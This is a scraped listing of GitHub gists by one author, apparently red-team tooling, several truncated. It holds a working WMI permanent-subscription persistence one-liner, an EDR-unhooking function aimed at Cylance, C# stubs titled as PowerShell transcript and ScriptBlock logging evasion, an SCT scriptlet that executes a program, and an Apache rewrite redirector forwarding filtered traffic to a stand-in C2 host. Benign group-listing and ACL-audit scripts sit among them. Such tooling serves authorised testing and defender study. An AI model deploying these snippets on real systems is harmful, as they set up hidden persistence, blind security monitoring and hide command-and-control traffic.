function Unhook-Cylance() {
$winapi = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
benpturner / WMIEvent
Created September 16, 2018 19:13
WMIEvent
# Permanent WMI event subscription built from three objects in the root\subscription namespace:
#   1. __EventFilter 'IEUpdateNOW'            - WQL query that polls Win32_LocalTime (WITHIN 60) for 09:30.
#   2. CommandLineEventConsumer 'IEUpdateNOW' - runs CommandLineTemplate verbatim when the filter fires;
#                                               "powershell -e blah" here is the author's placeholder.
#   3. __FilterToConsumerBinding              - ties filter to consumer; nothing runs until this exists.
# Statement order matters: the binding call uses the instances returned by the two preceding Set-WmiInstance calls.
# Review note: permanent subscriptions are stored in the WMI repository and persist across reboots. When
# auditing a host, enumerate all three classes in root\subscription (e.g. Get-WmiObject -Namespace root\subscription
# -Class __EventFilter) and review every CommandLineTemplate, since the consumer runs with no further user action.
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer}
# Background (technique write-up):
# https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
benpturner / whoami.txt
Last active September 16, 2018 19:11
Whoami /groups
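# Print the current Windows identity, then its group memberships as resolved "DOMAIN\Name" strings
# (a PowerShell stand-in for `whoami /groups`). Output shape is unchanged: the WindowsIdentity
# object first, then a Format-Table of the groups with one "Group Name" column.
([Security.Principal.WindowsIdentity]::GetCurrent());
$tl = @{
    Label      = "Group Name"
    Width      = 400
    Expression = {
        # Capture the SID string up front: inside `catch`, $_ is the ErrorRecord, not the group.
        $raw = $_.Value
        try {
            (New-Object System.Security.Principal.SecurityIdentifier($raw)).Translate([System.Security.Principal.NTAccount]).Value
        } catch [System.Security.Principal.IdentityNotMappedException] {
            # Translate() throws for SIDs with no account mapping (logon-session SIDs, orphaned
            # groups); the original emitted an error for that row, so show the raw SID instead.
            $raw
        }
    }
}
([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl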
benpturner / posh.cs
Last active November 22, 2022 12:00
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
benpturner / posh.cs
Created July 18, 2018 14:04
No Powershell with Transcript Logging Evasion
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll
benpturner / perms.ps1
Last active August 21, 2019 19:30
Powershell Perm Review
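# Recursive permission review: walk everything under $Root and export each item's ACL summary
# (child name, provider path, access string) to a CSV for offline inspection.
# Both values default to the original hard-coded paths.
$Root       = 'C:\'
$OutputPath = 'C:\temp\acl.csv'

Get-ChildItem -LiteralPath $Root -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
    # Capture the path before `try`: inside `catch`, $_ is the ErrorRecord, not the item.
    $path = $_.FullName
    try {
        # -LiteralPath: names containing [ ] * ? would otherwise be treated as wildcards by -Path
        # and fail. -ErrorAction Stop: Get-Acl reports most failures (e.g. access denied) as
        # non-terminating errors, which try/catch does not intercept unless they are promoted.
        Get-Acl -LiteralPath $path -ErrorAction Stop | Select-Object pschildname, pspath, accesstostring
    } catch {
        # Still best-effort (unreadable items are skipped, the walk continues), but the gaps in the
        # report are now visible with -Verbose instead of being silently dropped by an empty catch.
        Write-Verbose "Skipping '$path': $($_.Exception.Message)"
    }
} | Export-Csv -LiteralPath $OutputPath -NoTypeInformation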
benpturner / sct
Last active March 28, 2019 00:00
Simple CSript - Implied JScript
<cOmPoNeNt><sCRipT>
// Scriptlet whose <script> element carries no language attribute, so the host falls back to
// JScript (the "implied JScript" of the gist title). The single statement launches calc.exe
// through the Shell.Application COM object's ShellExecute method; the trailing "0" is the
// show-window argument.
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0");
</sCRipT></cOmPoNeNt>
benpturner / Whitelist
Last active August 1, 2017 09:37
Apache Rewrite Whitelist
# mod_rewrite allow-list: a request is reverse-proxied to the backend only when BOTH conditions
# hold - the client IP is present in the map file AND the User-Agent matches the pattern below.
# Anything else falls through to whatever the vhost normally serves.
#
# whitelist needs to be formatted like so
# 104.44.44.44 -
# 104.33.33.33 -
# (RewriteMap "txt:" files are "key value" pairs; the "-" is a dummy value so a hit returns
#  something other than the NOTFOUND default used in the lookup below.)
RewriteMap ips txt:/opt/whitelist.txt
# NOTE(review): "%%" is the escaped form of "%" in a %-formatted template, not httpd.conf syntax.
# In a file loaded directly by Apache these must be single "%{REMOTE_ADDR}" / "%{HTTP_USER_AGENT}"
# references, so this snippet appears intended to be rendered by a generator first - confirm.
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND
# Unanchored regex against the User-Agent (NC = case-insensitive), i.e. a substring match.
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC]
# P = proxy the request (requires mod_proxy); "yourc2server.com" is the author's placeholder backend.
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P]
benpturner / Simple HTTP Server
Created July 29, 2017 10:00
Simple HTTP Server
$serverport = '$port'
$httpresponse = '
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
benpturner / posh.cs
Last active July 18, 2018 18:59
Powershell.exe no more
using System;
using System.Text;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.EnterpriseServices;